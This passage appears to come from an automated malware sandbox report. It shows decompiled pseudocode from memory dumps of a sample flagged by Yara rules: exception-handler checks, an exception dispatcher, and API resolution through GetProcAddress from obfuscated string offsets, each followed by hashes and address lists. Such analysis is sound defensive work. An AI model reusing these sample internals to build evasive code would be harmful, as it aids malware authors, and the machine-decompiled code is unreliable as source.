				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x10004178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x100041c0 = 1;
										__eflags =  *0x100041c0;
										if( *0x100041c0 != 0) {
											goto L60;
										}
										_t84 =  *0x10004178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x100041c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x10004178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10004180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x1000417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x100041c0 = 1;
							__eflags =  *0x100041c0;
							if( *0x100041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x100041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10004180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x10004178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                                0x100023df
                                                                0x100023e2
                                                                0x100023e8
                                                                0x10002406
                                                                0x00000000
                                                                0x10002406
                                                                0x100023f0
                                                                0x100023f9
                                                                0x100023ff
                                                                0x1000240e
                                                                0x10002411
                                                                0x10002414
                                                                0x1000241e
                                                                0x1000241e
                                                                0x10002420
                                                                0x10002423
                                                                0x10002425
                                                                0x10002425
                                                                0x10002427
                                                                0x1000242a
                                                                0x00000000
                                                                0x00000000
                                                                0x1000242c
                                                                0x1000242e
                                                                0x10002494
                                                                0x10002494
                                                                0x100025f2
                                                                0x00000000
                                                                0x100025f2
                                                                0x10002430
                                                                0x10002430
                                                                0x10002434
                                                                0x10002436
                                                                0x10002436
                                                                0x10002436
                                                                0x10002436
                                                                0x10002439
                                                                0x1000243a
                                                                0x1000243d
                                                                0x1000243d
                                                                0x10002441
                                                                0x10002445
                                                                0x10002453
                                                                0x10002453
                                                                0x1000245b
                                                                0x10002461
                                                                0x10002463
                                                                0x10002465
                                                                0x10002475
                                                                0x10002482
                                                                0x10002486
                                                                0x1000248b
                                                                0x1000248d
                                                                0x1000250b
                                                                0x1000250b
                                                                0x1000248f
                                                                0x1000248f
                                                                0x1000248f
                                                                0x1000250d
                                                                0x1000250f
                                                                0x100025f0
                                                                0x100025f0
                                                                0x00000000
                                                                0x10002515
                                                                0x10002515
                                                                0x1000251c
                                                                0x00000000
                                                                0x00000000
                                                                0x10002522
                                                                0x10002526
                                                                0x10002582
                                                                0x10002584
                                                                0x1000258c
                                                                0x1000258e
                                                                0x10002590
                                                                0x00000000
                                                                0x00000000
                                                                0x10002592
                                                                0x10002598
                                                                0x1000259a
                                                                0x1000259c
                                                                0x100025b1
                                                                0x100025b1
                                                                0x100025b3
                                                                0x100025e2
                                                                0x100025e9
                                                                0x00000000
                                                                0x100025e9
                                                                0x100025b7
                                                                0x100025b8
                                                                0x100025ba
                                                                0x100025bc
                                                                0x100025bc
                                                                0x100025be
                                                                0x100025c0
                                                                0x100025c2
                                                                0x100025d6
                                                                0x100025d6
                                                                0x100025d9
                                                                0x100025db
                                                                0x100025db
                                                                0x100025dc
                                                                0x100025dc
                                                                0x00000000
                                                                0x100025c4
                                                                0x100025c4
                                                                0x100025c4
                                                                0x100025cd
                                                                0x100025ce
                                                                0x100025d0
                                                                0x100025d2
                                                                0x100025d2
                                                                0x00000000
                                                                0x100025c4
                                                                0x100025c2
                                                                0x1000259e
                                                                0x100025a5
                                                                0x100025a5
                                                                0x100025a7
                                                                0x00000000
                                                                0x00000000
                                                                0x100025a9
                                                                0x100025aa
                                                                0x100025ad
                                                                0x100025af
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x100025af
                                                                0x00000000
                                                                0x100025a5
                                                                0x10002528
                                                                0x1000252b
                                                                0x10002530
                                                                0x00000000
                                                                0x00000000
                                                                0x10002539
                                                                0x1000253b
                                                                0x10002541
                                                                0x00000000
                                                                0x00000000
                                                                0x10002547
                                                                0x1000254d
                                                                0x00000000
                                                                0x00000000
                                                                0x10002553
                                                                0x10002555
                                                                0x1000255e
                                                                0x10002562
                                                                0x00000000
                                                                0x00000000
                                                                0x10002568
                                                                0x1000256b
                                                                0x1000256d
                                                                0x00000000
                                                                0x00000000
                                                                0x10002574
                                                                0x10002576
                                                                0x00000000
                                                                0x00000000
                                                                0x10002578
                                                                0x1000257c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x1000257c
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x10002467
                                                                0x10002467
                                                                0x10002467
                                                                0x1000246e
                                                                0x00000000
                                                                0x00000000
                                                                0x10002470
                                                                0x10002471
                                                                0x10002473
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x10002473
                                                                0x1000249b
                                                                0x1000249d
                                                                0x00000000
                                                                0x00000000
                                                                0x100024ad
                                                                0x100024af
                                                                0x100024b1
                                                                0x00000000
                                                                0x00000000
                                                                0x100024b7
                                                                0x100024be
                                                                0x100024ea
                                                                0x100024ea
                                                                0x100024ec
                                                                0x100024ee
                                                                0x10002502
                                                                0x10002504
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x100024f0
                                                                0x100024f0
                                                                0x100024f0
                                                                0x100024f9
                                                                0x100024fa
                                                                0x100024fc
                                                                0x100024fe
                                                                0x100024fe
                                                                0x00000000
                                                                0x100024f0
                                                                0x100024c0
                                                                0x100024c3
                                                                0x100024c5
                                                                0x100024d7
                                                                0x100024d7
                                                                0x100024da
                                                                0x100024dc
                                                                0x100024dc
                                                                0x100024dd
                                                                0x100024dd
                                                                0x100024e3
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x100024c7
                                                                0x100024c7
                                                                0x100024c7
                                                                0x100024ce
                                                                0x00000000
                                                                0x00000000
                                                                0x100024d0
                                                                0x100024d0
                                                                0x100024d1
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x100024d1
                                                                0x100024d3
                                                                0x100024d5
                                                                0x100024e8
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x100024e8
                                                                0x00000000
                                                                0x100024d5
                                                                0x10002447
                                                                0x1000244a
                                                                0x1000244d
                                                                0x00000000
                                                                0x00000000
                                                                0x1000244f
                                                                0x10002451
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x10002451
                                                                0x10002416
                                                                0x10002418
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                APIs
                                                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002486
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp Download File
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MemoryQueryVirtual
                                                                • String ID:
                                                                • API String ID: 2850889275-0
                                                                • Opcode ID: e296e1fa631b054d567712d19c0ab76cc5d24d25f82f26ed71351941662be75e
                                                                • Instruction ID: f35057221c5491e74c9434013e617d5b9a1dbcad0d33e4fc59ed5e506bc34830
                                                                • Opcode Fuzzy Hash: e296e1fa631b054d567712d19c0ab76cc5d24d25f82f26ed71351941662be75e
                                                                • Instruction Fuzzy Hash: C661FF70A00A529FFB59CF28CDE065937E5FB883D5F268039D806C729DEB30DC828654
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F007C8, Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: t32c
                                                                • API String ID: 0-3674199949
                                                                • Opcode ID: 0a220eb0ad394ce7f48bb1dfebb681eba04389026c898d08045ceb5f49e526cc
                                                                • Instruction ID: 22cd638a52475023aefe711c528df42880fdcca086e0736978ca21b8b66986ae
                                                                • Opcode Fuzzy Hash: 0a220eb0ad394ce7f48bb1dfebb681eba04389026c898d08045ceb5f49e526cc
                                                                • Instruction Fuzzy Hash: 51516976A0021ADFEF14CF84DD80BA9B7B5FF84324F199195D8086B256D734AE81EF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F008B1, Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: t32c
                                                                • API String ID: 0-3674199949
                                                                • Opcode ID: 89354d468e3c39c9a9a37c07fa0284997cac03410efa2b11ca178cd160fd0644
                                                                • Instruction ID: 7652f06f680cc0d5bd16e31b536db5288ef487b95a4ef6bd19b435458c171739
                                                                • Opcode Fuzzy Hash: 89354d468e3c39c9a9a37c07fa0284997cac03410efa2b11ca178cd160fd0644
                                                                • Instruction Fuzzy Hash: 96516076A00219DFDF20CF44CD84BA9B3B5FF84324F158595D9086B252D734AE85FB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F0099D, Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: t32c
                                                                • API String ID: 0-3674199949
                                                                • Opcode ID: 815c5047575feb08699417f69d0f17cbf477ce9da8faa060a24343471615705c
                                                                • Instruction ID: c25b815e3404997479a21346cb6a9cb7ecd6b216baaa56bbf5d480d69c7ff4e1
                                                                • Opcode Fuzzy Hash: 815c5047575feb08699417f69d0f17cbf477ce9da8faa060a24343471615705c
                                                                • Instruction Fuzzy Hash: 9C418C76A00206DFEB20DF84CD80FA9B7B5FF88724F148194D9096B286C734AE80EF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F0090C, Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID: t32c
                                                                • API String ID: 0-3674199949
                                                                • Opcode ID: a534759c3a52090aba65ede1290774646e6cce45eb3ec6fed2a8c11357ddeac0
                                                                • Instruction ID: e793fe24affcdeedab6acc7eee4e8aafa2bc690584479c37e309809bfcda61e5
                                                                • Opcode Fuzzy Hash: a534759c3a52090aba65ede1290774646e6cce45eb3ec6fed2a8c11357ddeac0
                                                                • Instruction Fuzzy Hash: CD417E76A0021ADFDF20CF44DD84BA9B7B5FB88324F159195D9086B296D734EE81EB80
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F00B67, Relevance: .1, Instructions: 94COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 019e1bbd259f16fb127025000a77ff926888dac359d834cdd0fe3fdb5375895b
                                                                • Instruction ID: c056b9ddb8f53b28bcf730e561d915ecf28d8c53d141cf4d13dce9ccd53ddc3f
                                                                • Opcode Fuzzy Hash: 019e1bbd259f16fb127025000a77ff926888dac359d834cdd0fe3fdb5375895b
                                                                • Instruction Fuzzy Hash: 5D214CEB4016C22BEF809479A46A7D61790D7737D1FA5B804C7705F583A49E369F7340
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00F00B69, Relevance: .1, Instructions: 93COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.795656406.0000000000F00000.00000040.00000010.sdmp, Offset: 00F00000, based on PE: false
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2cfe75d20c724e3de4a904ed1e4f7d2c3d0319f8937dd1d43310649163742dca
                                                                • Instruction ID: ceecfffd77daa5ee513b7f2ab582d76ff8dac90cdc970e6228bcdd4ef48115db
                                                                • Opcode Fuzzy Hash: 2cfe75d20c724e3de4a904ed1e4f7d2c3d0319f8937dd1d43310649163742dca
                                                                • Instruction Fuzzy Hash: 232149EB8016C22BEE809839A46A7D61790D7B37D1FA5B804C7705F583A49E369F7340
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 100021B4, Relevance: .1, Instructions: 77COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 71%
                                                                			E100021B4(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E1000231B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E100023D5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E100022C0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E1000231B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E100023B7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                                0x100021b8
                                                                0x100021b9
                                                                0x100021ba
                                                                0x100021bd
                                                                0x100021bf
                                                                0x100021c2
                                                                0x100021c3
                                                                0x100021c5
                                                                0x100021c6
                                                                0x100021c7
                                                                0x100021ca
                                                                0x100021d4
                                                                0x10002285
                                                                0x1000228c
                                                                0x10002295
                                                                0x100021da
                                                                0x100021da
                                                                0x100021e0
                                                                0x100021e6
                                                                0x100021e9
                                                                0x100021ec
                                                                0x100021f0
                                                                0x100021f5
                                                                0x100021fa
                                                                0x1000227a
                                                                0x00000000
                                                                0x100021fc
                                                                0x100021fc
                                                                0x10002208
                                                                0x1000220a
                                                                0x10002265
                                                                0x10002265
                                                                0x1000226b
                                                                0x00000000
                                                                0x1000220c
                                                                0x1000221b
                                                                0x1000221d
                                                                0x1000221e
                                                                0x1000221f
                                                                0x10002222
                                                                0x10002222
                                                                0x10002224
                                                                0x00000000
                                                                0x10002226
                                                                0x10002226
                                                                0x10002270
                                                                0x10002228
                                                                0x10002228
                                                                0x1000222c
                                                                0x10002234
                                                                0x10002239
                                                                0x1000223e
                                                                0x1000224a
                                                                0x10002252
                                                                0x10002259
                                                                0x1000225f
                                                                0x10002263
                                                                0x00000000
                                                                0x10002263
                                                                0x10002226
                                                                0x10002224
                                                                0x00000000
                                                                0x1000220a
                                                                0x1000227e
                                                                0x1000227e
                                                                0x1000227e
                                                                0x100021fa
                                                                0x1000229a
                                                                0x100022a1

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp Download File
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b9cfe4f0bdb6303ce2c4ac46461865294472408feb2a20d02b7d0b95a6f7ac4f
                                                                • Instruction ID: 998f964cf8a00a12d388af1eaf269aed7343e4ee342723e71f6604d3686ecfb7
                                                                • Opcode Fuzzy Hash: b9cfe4f0bdb6303ce2c4ac46461865294472408feb2a20d02b7d0b95a6f7ac4f
                                                                • Instruction Fuzzy Hash: 7821CB37904204AFDB10DFA8C8C09ABF7A5FF49390B468168DD159B249D730FA15C7E0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 10001015, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E10001015(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E10001B5A(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x10004144 + 0x10005014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x10004144 + 0x10005151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E1000167E(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x10004144 + 0x10005161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x10004144 + 0x10005174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x10004144 + 0x10005189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x10004144 + 0x1000519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E1000119D(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                                                0x10001023
                                                                0x10001027
                                                                0x100010e8
                                                                0x1000102d
                                                                0x10001045
                                                                0x10001054
                                                                0x1000105b
                                                                0x1000105d
                                                                0x10001062
                                                                0x100010e0
                                                                0x100010e1
                                                                0x10001064
                                                                0x10001071
                                                                0x10001073
                                                                0x10001078
                                                                0x00000000
                                                                0x1000107a
                                                                0x10001087
                                                                0x10001089
                                                                0x1000108e
                                                                0x00000000
                                                                0x10001090
                                                                0x1000109d
                                                                0x1000109f
                                                                0x100010a4
                                                                0x00000000
                                                                0x100010a6
                                                                0x100010b3
                                                                0x100010b5
                                                                0x100010ba
                                                                0x00000000
                                                                0x100010bc
                                                                0x100010c2
                                                                0x100010c8
                                                                0x100010cd
                                                                0x100010d2
                                                                0x100010d7
                                                                0x00000000
                                                                0x100010d9
                                                                0x100010dc
                                                                0x100010dc
                                                                0x100010d7
                                                                0x100010ba
                                                                0x100010a4
                                                                0x1000108e
                                                                0x10001078
                                                                0x10001062
                                                                0x100010f6

                                                                APIs
                                                                  • Part of subcall function 10001B5A: HeapAlloc.KERNEL32(00000000,?,10001567,00000030,751463F0,00000000), ref: 10001B66
                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001135,?,?,?,?,?,00000002,?,?), ref: 10001039
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 1000105B
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 10001071
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 10001087
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 1000109D
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 100010B3
                                                                  • Part of subcall function 1000119D: memset.NTDLL ref: 1000121C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                • Associated: 00000000.00000002.805526913.0000000010005000.00000040.00020000.sdmp Download File
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AddressProc$AllocHandleHeapModulememset
                                                                • String ID:
                                                                • API String ID: 426539879-0
                                                                • Opcode ID: b288b49a4e8b1c137c23ed9d2ec13d74b578a45b68eb5a836a89574cd346c7cf
                                                                • Instruction ID: 2943e8e674912cac2eae58d6d970e7e89ef88163b07fe81432c65c35558539c2
                                                                • Opcode Fuzzy Hash: b288b49a4e8b1c137c23ed9d2ec13d74b578a45b68eb5a836a89574cd346c7cf
                                                                • Instruction Fuzzy Hash: 70214DB060074AAFE711DFAACC90A9BB7ECEF443C17018466F544C7219EBB1E944CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%